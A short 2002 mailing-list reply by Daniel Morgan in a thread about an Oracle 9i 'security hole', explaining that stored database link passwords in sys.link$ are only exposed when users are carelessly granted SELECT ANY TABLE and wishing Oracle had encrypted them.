Re: 9iDB Security Hole?

From: Daniel Morgan <damorgan_at_exesolutions.com>
Date: Mon, 15 Apr 2002 23:15:13 GMT

Why ouch? This is known for database links for a long long time. It is not present there if you create the link in one of the manners that supports security.

And no one other than sys should be looking at sys.link$ anyway. If they are you have been granting SELECT ANY TABLE to people without regard to its implications. In 9i access, even with SELECT ANY TABLE goes away. And hopefully stays that way.

But if I had my preference, which I don't, Oracle would have encrypted it back at version 7.x or before. I would be interested in hearing from anyone inside of Oracle why this is there. Thanks.

Daniel Morgan